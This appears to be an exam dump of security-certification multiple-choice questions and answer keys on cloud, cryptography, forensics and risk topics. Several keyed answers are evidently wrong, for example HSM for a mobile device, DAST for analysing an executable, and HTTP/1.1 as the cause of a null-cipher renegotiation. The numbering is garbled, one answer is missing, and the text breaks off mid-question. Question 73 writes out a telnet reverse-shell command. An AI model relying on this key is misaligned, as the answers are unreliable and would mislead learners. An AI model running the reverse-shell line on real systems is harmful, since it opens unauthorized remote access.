301-400

Question 1

351. A security administrator is opening connectivity on a firewall between Organization A and Organization B Organization B just acquired Organization A.

Which of the following risk mitigation strategies should the administrator implement to reduce the risk involved with this change?

A. DLP on internal network nodes
B. A network traffic analyzer for incoming traffic
C. A proxy server to examine outgoing web traffic
D. IPS/IDS monitoring on the new connection

Answer 1

D. IPS/IDS monitoring on the new connection

Question 2

An organization is facing budget constraints The Chief Technology Officer (CTO) wants to add a new marketing platform but the organization does not have the resources to obtain separate
servers to run the new platform. The CTO recommends running the new marketing platform on a virtualized video-conferencing
server because video conferencing is rarely used. The Chief Information Security Officer (CISO) denies this request.

Which of the following BEST explains the reason why the CISO has not approved the request?

A. Privilege escalation attacks
B. Performance and availability
C. Weak DAR encryption
D. Disparate security requirements

Answer 2

D. Disparate security requirements

Question 3

A cloud architect needs to isolate the most sensitive portion of the network while maintaining hosting in a public cloud.

Which of the following configurations can be employed to support this effort?

A. Create a single-tenancy security group in the public cloud that hosts only similar types of servers
B. Privatize the cloud by implementing an on-premises instance.
C. Create a hybrid cloud with an on-premises instance for the most sensitive server types.
D. Sandbox the servers with the public cloud by server type

Answer 3

A. Create a single-tenancy security group in the public cloud that hosts only similar types of servers

Question 4

A financial services company has proprietary trading algorithms, which were created and are maintained by a team of developers on their private source code repository. If the details of this operation became known to competitors, the company’s ability to profit from its trading would disappear immediately.

Which of the following would the company MOST likely use to protect its trading algorithms?

A. Single-tenancy cloud
B. Managed security service providers
C. Virtual desktop infrastructure
D. Cloud security broker

Answer 4

A. Single-tenancy cloud

Question 5

An attacker wants to gain information about a company’s database structure by probing the database listener. The attacker tries to manipulate the company’s database to see if it has any vulnerabilities that can be exploited to help carry out an attack.

To prevent this type of attack, which of the following should the company do to secure its database?

A. Mask the database banner
B. Tighten database authentication and limit table access
C. Harden web and Internet resources
D. Implement challenge-based authentication

Answer 5

B. Tighten database authentication and limit table access

Question 6

An organization based in the United States is planning to expand its operations into the European market later in the year Legal counsel is exploring the additional requirements that must be
established as a result of the expansion.

The BEST course of action would be to

A. revise the employee provisioning and deprovisioning procedures
B. complete a quantitative risk assessment
C. draft a memorandum of understanding
D. complete a security questionnaire focused on data privacy.

Answer 6

D. complete a security questionnaire focused on data privacy.

Question 7

A security engineer wants to introduce key stretching techniques to the account database to make password guessing attacks more difficult.

Which of the following should be considered to achieve this? (Choose two)

A. Digital signature
B. bcrypt
C. Perfect forward secrecy
D. SHA-256
E. P-384
F. PBKDF2
G. Record-level encryption

Answer 7

B and F

Question 8

As part of an organization’s ongoing vulnerability assessment program, the Chief Information Security Officer (CISO) wants to evaluate the organization’s systems, personnel, and facilities for
various threats. As part of the assessment the CISO plans to engage an independent cybersecurity assessment firm to perform social engineering and physical penetration testing against the organization’s corporate offices and remote locations.

Which of the following techniques would MOST likely be employed as part of this assessment? (Choose three.)

A. Privilege escalation
B. SQL injection
C. TOC/TOU exploitation
D. Rogue AP substitution
E. Tailgating
F. Vulnerability scanning
G. Vishing
H. Badge skimming

Answer 8

E, G, H

Question 9

A security engineer discovers a PC may have been breached and accessed by an outside agent. The engineer wants to find out how this breach occurred before remediating the damage.

Which of the following should the security engineer do FIRST to begin this investigation?

A. Create an image of the hard drive
B. Capture the incoming and outgoing network traffic
C. Dump the contents of the RAM
D. Parse the PC logs for information on the attacker.

Answer 9

C. Dump the contents of the RAM

Question 10

A hospital is using a functional magnetic resonance imaging (fMRI) scanner, which is controlled legacy desktop connected to the network. The manufacturer of the fMRI will not support patching of the legacy system. The legacy desktop needs to be network accessible on TCP port 445. A security administrator is concerned the legacy system will be vulnerable to exploits.

Which of the following would be the BEST strategy to reduce the risk of an outage while still providing for security?

A. Install HIDS and disable unused services.
B. Enable application whitelisting and disable SMB.
C. Segment the network and configure a controlled interface
D. Apply only critical security patches for known vulnerabilities.

Answer 10

C. Segment the network and configure a controlled interface

Question 11

A Chief Information Security Officer (CISO) has created a survey that will be distributed to managers of mission-critical functions across the organization. The survey requires the managers to determine how long their respective units can operate in the event of an extended IT outage before the organization suffers monetary losses from the outage.

To which of the following is the survey question related? (Choose two.)

A. Risk avoidance
B. Business impact
C. Risk assessment
D. Recovery point objective
E. Recovery time objective
F. Mean time between failures

Answer 11

B & E

Question 12

Following a recent security incident on a web server the security analyst takes HTTP traffic captures for further investigation. The analyst suspects certain jpg files have important data hidden within them.

Which of the following tools will help get all the pictures from within the HTTP traffic captured to a specified folder?

A. tshark
B. memdump
C. nbtstat
D. dd

Answer 12

A. tshark

Question 13

A company has completed the implementation of technical and management controls as required by its adopted security, ponies and standards. The implementation took two years and consumed s the budget approved to security projects. The board has denied any further requests for additional budget.

Which of the following should the company do to address the residual risk?

A. Transfer the risk
B. Baseline the risk.
C. Accept the risk
D. Remove the risk

Answer 13

C. Accept the risk

Question 14

An e-commerce company that provides payment gateways is concerned about the growing expense and time associated with PCI audits of its payment gateways and external audits by customers for their own compliance reasons. The Chief Information Officer (CIO) asks the security team to provide a list of options that will:

1. Reduce the overall cost of these audits
2. Leverage existing infrastructure where possible
3. Keep infrastructure costs to a minimum
4. Provide some level of attestation of compliance

Which of the following will BEST address the CIO”s concerns? (Choose two.)

A. Invest in new UBA to detect report, and remediate attacks faster
B. Segment the network to reduce and limit the audit scope
C. Undertake ISO certification for all core infrastructure including datacenters.
D. Implement a GRC system to track and monitor controls
E. Implement DLP controls on HTTP’HTTPS and email
F. Install EDR agents on all corporate endpoints

Answer 14

B & D

Question 15

An employee decides to log into an authorized system. The system does not prompt the employee for authentication prior to granting access to the console, and it cannot authenticate the network resources.

Which of the following attack types can this lead to if it is not mitigated?

A. Memory leak
B. Race condition
C. Smurf
D. Resource exhaustion

Answer 15

B. Race condition

Question 16

A company is implementing a new secure identity application, given the following requirements:

• The cryptographic secrets used in the application must never be exposed to users or the OS
• The application must work on mobile devices.
• The application must work with the company’s badge reader system

Which of the following mobile device specifications are required for this design? (Choose two.)

A. Secure element
B. Biometrics
C. UEFI
D. SEAndroid
E. NFC
F. HSM

Answer 16

E & F

Question 17

A small firm’s newly created website has several design flaws.
The developer created the website to be fully compatible with ActiveX scripts in order to use various digital certificates and trusting certificate authorities. However, vulnerability testing indicates sandboxes were enabled, which restricts the code’s
access to resources within the user’s computer.

Which of the following is the MOST likely cause of the error”?

A. The developer inadvertently used Java applets.
B. The developer established a corporate account with a non-reputable certification authority.
C. The developer used fuzzy logic to determine how the web browser would respond once ports 80and 443 were both open
D. The developer did not consider that mobile code would be transmitted across the network.

Answer 17

A. The developer inadvertently used Java applets.

Question 18

An organization is integrating an ICS and wants to ensure the system is cyber resilient. Unfortunately, many of the specialized components are legacy systems that cannot be patched. The existing enterprise consists of mission-critical systems that require 99.9% uptime.

To assist in the appropriate design of the system given the constraints, which of the following
MUST be assumed?

A. Vulnerable components
B. Operational impact due to attack
C. Time criticality of systems
D. Presence of open-source software

Answer 18

A. Vulnerable components

Question 19

The Chief Information Security Officer (CISO) of an organization is concerned with the transmission of cleartext authentication information across the enterprise. A security assessment has been performed and has identified the use of ports 80, 389, and 3268.

Which of the following solutions would BEST address the CISO’s concerns?

A. Disable the ports that are determined to contain authentication information
B. Force HTTPS, enable LDAPS, and disable cleartext global catalog communication.
C. Deploy a VPN between networks that transmits authentication information via cleartext
D. Proxy HTTP traffic and migrate to a more secure directory service

Answer 19

B. Force HTTPS, enable LDAPS, and disable cleartext global catalog communication.

Question 19

Two competing companies experienced similar attacks on their networks from various threat
actors. To improve response times, the companies wish to share some threat intelligence about
the sources and methods of attack. Which of the following business documents would be BEST
to document this engagement?

A. Business partnership agreement
B. Memorandum of understanding
C. Service-level agreement
D. Interconnection security agreement

Answer 19

D. Interconnection security agreement

Question 20

A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password.

Which of the following describes why this request is a security concern? (Choose two.)

A. The request is evidence that the password is more open to being captured via a keylogger.
B. The request proves that salt has not been added to the password hash, thus making it vulnerable to rainbow tables.
C. The request proves the password is encoded rather than encrypted and thus less secure as it can be easily reversed.
D. The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password.
E. The request proves the password is stored in a reversible format, making it readable by anyone at the bank who is given access.
F. The request proves the password must be in cleartext during transit, making it open to on-path attacks.

Answer 20

D & E

Question 21

A company would like to obfuscate PII data accessed by an application that is housed in a database to prevent unauthorized viewing. Which of the following should the company do to
accomplish this goal?

A. Use cell-level encryption.
B. Mask the data.
C. Implement a DLP solution.
D. Utilize encryption at rest.

Answer 21

B. Mask the data.

Question 22

Which of the following BEST describe the importance of maintaining chain of custody in forensic evidence collection? (Choose two.)

A. It increases the likelihood that evidence will be deemed admissible in court.
B. It authenticates personnel who come in contact with evidence after collection.
C. It ensures confidentiality and the need-to-know basis of forensically acquired evidence.
D. It attests to how recently evidence was collected by recording date/time attributes.
E. It provides automated attestation for the integrity of the collected evidence.
F. It ensures the integrity of the collected evidence.

Answer 22

A & F

Question 23

An organization collects personal data from its global customers. The organization determines how that data is going to be used, why it is going to be used, and how it is manipulated for business processes.

Which of the following will the organization need in order to comply with GDPR? (Choose two.)

A. Data processor
B. Data custodian
C. Data owner
D. Data steward
E. Data controller
F. Data manager

Answer 23

A & E

Question 24

The Chief Executive Officer (CEO) of a small wholesaler with low margins is concerned about the use of a newly developed artificial intelligence algorithm being used in the organization’s marketing tool. The tool can make automated purchasing approval decisions based on data provided by customers and collected from the Internet.

Which of the following is MOST likely the concern? (Choose two.)

A. Required computing power
B. Cost to maintain
C. Customer privacy
D. Adversarial attacks
E. Information bias
F. Customer approval speed

Answer 24

C & E

Question 25

An organization recently recovered from an attack that featured an adversary injecting malicious logic into OS bootloaders on endpoint devices. Therefore, the organization decided to require the use of TPM for measured boot and attestation, monitoring each component from the UEFI through the full loading of OS components.

Which of the following TPM structures enables this storage functionality?

A. Endorsement tickets
B. Clock/counter structures
C. Command tag structures with MAC schemes
D. Platform configuration registers

Answer 25

D. Platform configuration registers

Question 26

A company created an external, PHP-based web application for its customers. A security researcher reports that the application has the Heartbleed vulnerability.

Which of the following would BEST resolve and mitigate the issue? (Choose two.)

A. Deploying a WAF signature
B. Fixing the PHP code
C. Changing the web server from HTTPS to HTTP
D. Using SSLv3
E. Changing the code from PHP to ColdFusion
F. Updating the OpenSSL library

Answer 26

B & F

Question 27

An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime.

Which of the following should the analyst perform?

A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics.
B. Implement every solution one at a time in a virtual lab, running a metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next.
Choose the best solution based on the best metrics.
C. Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the best metrics.
D. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.

Answer 27

D. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.

Question 28

An investigator is attempting to determine if recent data breaches may be due to issues with a
company’s web server that offers news subscription services.
The investigator has gathered the following data:

• Clients successfully establish TLS connections to web services provided by the server.
• After establishing the connections, most client connections are renegotiated.
• The renegotiated sessions use cipher suite TLS_RSA_WITH_NULL_SHA.

Which of the following is the MOST likely root cause?

A. The clients disallow the use of modem cipher suites.
B. The web server is misconfigured to support HTTP/1.1
C. A ransomware payload dropper has been installed.
D. An entity is performing downgrade attacks on path.

Answer 28

B. The web server is misconfigured to support HTTP/1.1

Question 29

Which of the following is MOST commonly found in a network SLA contract?

A. Price for extra services
B. Performance metrics
C. Service provider responsibility only
D. Limitation of liability
E. Confidentiality and non-disclosure

Answer 29

B. Performance metrics

Question 30

A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathered the following data:

• dbadmin last logged in at 7:30 a.m. and logged out at 8:05 a.m.- A persistent TCP/6667 connection to the external address was established at 7:55 a.m. The connection is still active.- Other than bytes transferred to keep the connection alive, only a fewkilobytes of data transfer every hour since the start of theconnection.
• A sample outbound request payload from PCAP showed the ASCII content: “JOIN #community”.

Which of the following is the MOST likely root cause?

A. A SQL injection was used to exfiltrate data from the database server.
B. The system has been hijacked for cryptocurrency mining.
C. A botnet Trojan is installed on the database server.
D. The dbadmin user is consulting the community for help via Internet Relay Chat.

Answer 30

C. A botnet Trojan is installed on the database server.

Question 31

Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely?

A. Key escrow
B. TPM
C. Trust models
D. Code signing

Answer 31

A. Key escrow

Question 32

In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they:

A. have basic utility coverage, including power and water.
B. provide workstations and read-only domain controllers.
C. are generally the least costly to sustain.
D. are the quickest way to restore business.
E. are geographically separated from the company’s primary facilities.

Answer 32

C. are generally the least costly to sustain.

Question 33

During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security- monitoring control in place.

Which of the following is the MOST likely solution?

A. A WAF to protect web traffic
B. User and entity behavior analytics
C. Requirements to change the local password
D. A gap analysis

Answer 33

B. User and entity behavior analytics

Question 34

An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother’s maiden name. When all of these are entered correctly, a new password is emailed to the user.

Which of the following should concern the analyst the MOST?

A. The security answers may be determined via online reconnaissance.
B. The password is too long, which may encourage users to write the password down.
C. The password should include a special character.
D. The minimum password length is too short.

Answer 34

A. The security answers may be determined via online reconnaissance.

Question 35

A security researcher has been given an executable that was captured by a honeypot.

Which of the following should the security researcher implement to test the executable?

A. OSINT
B. SAST
C. DAST
D. OWASP

Answer 35

C. DAST

Question 36

An executive has decided to move a company’s customer-facing application to the cloud after experiencing a lengthy power outage at a locally managed service provider’s data center. The
executive would like a solution that can be implemented as soon as possible.

Which of the following will BEST prevent similar issues when the service is running in the cloud? (Choose two.)

A. Placing the application instances in different availability zones
B. Restoring the snapshot and starting the new application instance from a different zoneC. Enabling autoscaling based on application instance usage
D. Having several application instances running in different VPCs
E. Using the combination of block storage and multiple CDNs in each application instanceF. Setting up application instances in multiple regions

Answer 36

A & F

Question 37

A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service.

Which of the following is the BEST solution to help prevent this type of attack in the future?

A. NGFW for web traffic inspection and activity monitoring
B. CSPM for application configuration control
C. Targeted employee training and awareness exercises
D. CASB for OAuth application permission control

Answer 37

C. Targeted employee training and awareness exercises

Question 38

A product manager at a new company needs to ensure the development team produces high quality code on time. The manager has decided to implement an agile development approach instead of waterfall.

Which of the following are reasons to choose an agile development approach? (Choose two.)

A. The product manager gives the developers more autonomy to write quality code prior to deployment.
B. An agile approach incorporates greater application security in the development process than a waterfall approach does.
C. The scope of work is expected to evolve during the lifetime of project development.
D. The product manager prefers to have code iteratively tested throughout development.
E. The product manager would like to produce code in linear phases.
F. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall.

Answer 38

C & D

Question 39

In a cloud environment, the provider offers relief to an organization’s teams by sharing in many of the operational duties.

In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation?

A. Application-specific data assets
B. Application user access management
C. Application-specific logic and code
D. Application/platform software

Answer 39

D. Application/platform software

Question 40

A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems Some of the requirements are:

• Handle an increase in customer demand of resources
• Provide quick and easy access to information
• Provide high-quality streaming media
• Create a user-friendly interface

Which of the following actions should be taken FIRST?

A. Deploy high-availability web servers.
B. Enhance network access controls.
C. Implement a content delivery network.
D. Migrate to a virtualized environment.

Answer 40

C. Implement a content delivery network.

Question 41

In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements.

The current cloud provider that the company is using offers:
- Only multitenant cloud hosting
- Minimal physical security
- Few access controls
- No access to the data center

The following information has been uncovered:
- The company is located in a known floodplain. which flooded last year.
- Government regulations require data to be stored within the country.

Which of the following should be addressed FIRST?

A. Update the disaster recovery plan to account for natural disasters.
B. Establish a new memorandum of understanding with the cloud provider.
C. Establish a new service-level agreement with the cloud provider.
D. Provision services according to the appropriate legal requirements.

Answer 41

D. Provision services according to the appropriate legal requirements.

Question 42

A security administrator needs to implement an X.509 solution for multiple sites within the human resources department. This solution would need to secure all subdomains associated with the domain name of the main human resources web server.

Which of the following would need to be implemented to properly secure the sites and provide easier private key management?

A. Certificate revocation list
B. Digital signature
C. Wildcard certificate
D. Registration authority
E. Certificate pinning

Answer 42

C. Wildcard certificate

Question 43

An organization’s threat team is creating a model based on a number of incidents in which systems in an air-gapped location are compromised. Physical access to the location and logical
access to the systems are limited to administrators and select, approved, on-site company employees.

Which of the following is the BEST strategy to reduce the risks of data exposure?

A. NDAs
B. Mandatory access control
C. NIPS
D. Security awareness training

Answer 43

B. Mandatory access control

Question 44

Ubuntu Virtual Sim

Answer 44

1. Log-in
2. Open Terminal
3. $sudo systemctl list-units
4. look for the “malicious.service”
5. $sudo systemctl disable malicious.service
6. $sudo systemctl stop malicious.service
7. $sudo systemctl list-units
8. $ps -A
9. $kill -9 PID

Question 45

An analyst received a list of IOCs from a government agency. The attack has the following characteristics:

1. The attack starts with bulk phishing.
2. If a user clicks on the link, a dropper is downloaded to the computer.
3. Each of the malware samples has unique hashes tied to the user. The analyst needs to identify whether existing endpoint controls are effective.

Which of the following risk mitigation techniques should the analyst use?

A. Update the incident response plan.
B. Blocklist the executable.
C. Deploy a honeypot onto the laptops.
D. Detonate in a sandbox.

Answer 45

D. Detonate in a sandbox.

Question 46

Which of the following BEST describes a common use case for homomorphic encryption?

A. Processing data on a server after decrypting in order to prevent unauthorized access in transit
B. Maintaining the confidentiality of data both at rest and in transit to and from a CSP for processing
C. Transmitting confidential data to a CSP for processing on a large number of resources without revealing information
D. Storing proprietary data across multiple nodes in a private cloud to prevent access by unauthenticated users

Answer 46

C. Transmitting confidential data to a CSP for processing on a large number of resources without revealing information

Question 47

A security analyst runs a vulnerability scan on a network administrator’s workstation. The network administrator has direct administrative access to the company’s SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user’s browser, OS, email client, and an offline password manager.

Which of the following should the security analyst patch FIRST?

A. Email client
B. Password manager
C. Browser
D. OS

Answer 47

B. Password manager

Question 48

An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft.

Which of the following can be used to mitigate this risk?

A. An additional layer of encryption
B. A third-party, data integrity monitoring solution
C. A complete backup that is created before moving the data
D. Additional application firewall rules specific to the migration

Answer 48

A. An additional layer of encryption

Question 49

A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity.

Which of the following should the developer implement in the code?

A. RSA
B. OCSP
C. HSTS
D. CRL

Answer 49

B. OCSP

Question 50

Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application.

Which of the following MOST likely needs to be done to avoid this in the future?

A. Modify the ACLs.
B. Review the Active Directory.
C. Update the marketing department’s browser.
D. Reconfigure the WAF.

Answer 50

A. Modify the ACLs.

Question 51

A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported
operating system, but the ICS software running on the server is not compatible with modem operating systems.

Which of the following compensating controls should be implemented to BEST protect the server?

A. Application allow list
B. Antivirus
C. HIPS
D. Host-based firewall

Answer 51

D. Host-based firewall

Question 52

A city government’s IT director was notified by the city council that the following cybersecurity requirements must be met to be awarded a large federal grant:

• Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.
• All privileged user access must be tightly controlled and tracked tomitigate compromised accounts.
• Ransomware threats and zero-day vulnerabilities must be quickly identified.

Which of the following technologies would BEST satisfy these requirements? (Choose three.)

A. Endpoint protection
B. Log aggregator
C. Zero trust network access
D. PAM
E. Cloud sandbox
F. SIEM
G. NGFW

Answer 52

B, D, E

Question 53

Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system.
To help users with the transition. Company A is requiring the following:

• Before the merger is complete, users from both companies should use a single set of usernames and passwords.
• Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.
• Users from Company B should be able to access Company A’s available resources.

Which of the following are the BEST solutions? (Choose two.)

A. Installing new Group Policy Object policies
B. Establishing one-way trust from Company B to Company A
C. Enabling SAML
D. Implementing attribute-based access control
E. Installing Company A’s Kerberos systems in Company B’s network
F. Updating login scripts

Answer 53

B & C

Question 54

Prior to a risk assessment inspection, the Chief Information Officer tasked the systems administrator with analyzing and reporting any configuration issues on the information systems, and then verifying existing security settings.

Which of the following would be BEST to use?

A. SCAP
B. CVSS
C. XCCDF
D. CMDB

Answer 54

A. SCAP

Question 55

An organization is looking to establish more robust security measures by implementing PKI.

Which of the following should the security analyst implement when considering mutual authentication?

A. Perfect forward secrecy on both endpoints
B. Shared secret for both endpoints
C. Public keys on both endpoints
D. A common public key on each endpoint
E. A common private key on each endpoint

Answer 55

C. Public keys on both endpoints

Question 56

An organization’s senior security architect would like to develop cyber defensive strategies based on standardized adversary techniques, tactics, and procedures commonly observed.

Which of the following would BEST support this objective?

A. OSINT analysis
B. The Diamond Model of Intrusion Analysis
C. MITRE ATT&CK
D. Deepfake generation
E. Closed-source intelligence reporting

Answer 56

C. MITRE ATT&CK

Question 57

A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification.

Which of the following would be BEST for the developer to perform? (Choose two.)

A. Utilize code signing by a trusted third party.
B. Implement certificate-based authentication.
C. Verify MD5 hashes.
D. Compress the program with a password.
E. Encrypt with 3DES.
F. Make the DACL read-only.

Answer 57

A & C

Question 58

A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution?

A. Develop an Nmap plug-in to detect the indicator of compromise.
B. Update the organization’s group policy.
C. Include the signature in the vulnerability scanning tool.
D. Deliver an updated threat signature throughout the EDR system.

Answer 58

D. Deliver an updated threat signature throughout the EDR system.

Question 59

A company wants to implement a new website that will be accessible via browsers with no mobile applications available. The new website will allow customers to submit sensitive medical
information securely and receive online medical advice. The company already has multiple other websites where it provides various public health data and information. The new website must
implement the following:

• The highest form of web identity validation
• Encryption of all web transactions
• The strongest encryption in-transit
• Logical separation based on data sensitivity

Other things that should be considered include:
- The company operates multiple other websites that use encryption.- The company wants to minimize total expenditure.
- The company wants to minimize complexity.

Which of the following should the company implement on its new website? (Choose two.)

A. Wildcard certificate
B. EV certificate
C. Mutual authentication
D. Certificate pinning
E. SSO
F. HSTS

Answer 59

B & F

Question 60

Which of the following is used to assess compliance with internal and external requirements?

A. RACI matrix
B. Audit report
C. After-action report
D. Business continuity plan

Answer 60

B. Audit report

Question 61

A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints.

Which of the following processes, if executed, would be MOST likely to expose an attacker?

A. Reviewing video from IP cameras within the facility
B. Reconfiguring the SIEM connectors to collect data from the perimeter network hosts
C. Implementing integrity checks on endpoint computing devices
D. Looking for privileged credential reuse on the network

Answer 61

D. Looking for privileged credential reuse on the network

Question 62

A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data.

Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.)

A. EDE
B. CBC
C. GCM
D. AES
E. RSA
F. RC4
G. ECDSA
H. DH

Answer 62

C, D, G

Question 63

A security architect is advising the application team to implement the following controls in the application before it is released:
- Least privilege
- Blocklist input validation for the following characters: <>;, =”#+

Based on the requirements, which of the following attacks is the security architect trying to prevent?

A. XML injection
B. LDAP injection
C. CSRF
D. XSS

Answer 63

D. XSS

Question 64

A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes.

Which of the following would be BEST to use as part of the process to support copyright protections of the document?

A. Steganography
B. E-signature
C. Watermarking
D. Cryptography

Answer 64

A. Steganography

Question 65

A security analyst is using data provided from a recent penetration test to calculate CVSS scores to prioritize remediation.

Which of the following metric groups would the analyst need to determine to get the overall scores? (Choose three.)

A. Temporal
B. Availability
C. Integrity
D. Confidentiality
E. Base
F. Environmental
G. Impact
H. Attack vector

Answer 65

A, E, F

Question 66

During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost.

Which of the following should the security analyst have followed?

A. Order of volatility
B. Chain of custody
C. Verification
D. Secure storage

Answer 66

A. Order of volatility

Question 67

A global organization’s Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization’s current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider.

Which of the following is MOST likely identified as a potential risk by the CISO?

A. The SD-WAN provider would not be able to handle the organization’s bandwidth requirements.
B. The operating costs of the MPLS network are too high for the organization.
C. The SD-WAN provider may not be able to support the required troubleshooting and maintenance.
D. Internal IT staff will not be able to properly support remote offices after the migration.

Answer 67

C. The SD-WAN provider may not be able to support the required troubleshooting and maintenance.

Question 68

A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application.

The cloud architecture team was given the following requirements:
- The application must run at 70% capacity at all times
- The application must sustain DoS and DDoS attacks.
- Services must recover automatically.

Which of the following should the cloud architecture team implement? (Choose three.)

A. Read-only replicas
B. BCP
C. Autoscaling
D. WAF
E. CDN
F. Encryption
G. Continuous snapshots
H. Containerization

Answer 68

C,D,G

Question 69

A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:

• Fast scanning
• The least false positives possible
• Signature-based
• A low impact on servers when performing a scan

In addition, the customer has several screened subnets, VLANs, and branch offices.
Which of the following will BEST meet the customer’s needs?

A. Authenticated scanning
B. Passive scanning
C. Unauthenticated scanning
D. Agent-based scanning

Answer 69

C. Unauthenticated scanning

Question 70

Real-time, safety-critical systems MOST often use serial busses that:

A. have non-deterministic behavior and are not deployed with encryption.
B. have non-deterministic behavior and are deployed with encryption.
C. have deterministic behavior and are deployed with encryption.
D. have deterministic behavior and are not deployed with encryption.

Answer 70

D. have deterministic behavior and are not deployed with encryption.

Question 71

A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code.

Which of the following can the company do to address this finding? (Choose two.)

A. Implement complex, key-length API key management.
B. Implement user session logging.
C. Implement time-based API key management.
D. Use SOAP instead of restful services.
E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets.
F. Enforce MFA on the developers’ workstations and production systems.

Answer 71

A & E

Question 72

When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed.

Which of the following BEST meets this requirement?

A. Mobile device management with remote wipe capabilities
B. Passwordless smart card authorization with biometrics
C. Next-generation endpoint detection and response agent
D. Full disk encryption with centralized key management

Answer 72

D. Full disk encryption with centralized key management

Question 73

A penetration tester inputs the following command:

telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344

This command will allow the penetration tester to establish a:

A. port mirror.
B. network pivot.
C. reverse shell.
D. proxy chain.

Answer 73

C. reverse shell.

Question 74

A security engineer is reviewing a record of events after a recent data breach incident that involved the following:

• A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets.
• A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
• The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection.

Which of the following is the BEST solution to help prevent this type of attack from being successful in the future?

A. Dynamic analysis
B. Secure web gateway
C. Software composition analysis
D. User behavior analysis
E. Stateful firewall

Question 75

A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings.

Which of the following resources would the analyst MOST likely adopt?

A. OSINT
B. ISO
C. MITRE ATT&CK
D. OWASP

Answer 75

C. MITRE ATT&CK

Question 76

A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role based access, and one-time authentication.

Which of the following will need to be implemented to achieve this objective? (Choose three.)

A. Least privilege
B. VPN
C. Policy automation
D. PKI
E. Firewall
F. Continuous validation
G. Continuous integration
H. IaaS

Answer 76

A, C, F

Question 77

A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s Infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic.

Which of the following would be the BEST solution to meet these requirements?

A. Block all outbound traffic and implement an inline firewall.
B. Allow only wireless connections and proxy the traffic through a network tap.
C. Establish an air-gapped network and implement an IDS.
D. Use a separate VLAN with an ACL and implement network detection and response.

Answer 77

D. Use a separate VLAN with an ACL and implement network detection and response.

Question 78

A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort?

A. objdump
B. OllyDbg
C. FTK Imager
D. Ghidra

Answer 78

D. Ghidra

Question 79

A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes.

Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring?

A. Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs.
B. Perform software composition analysis and remediate vulnerabilities found in the software.
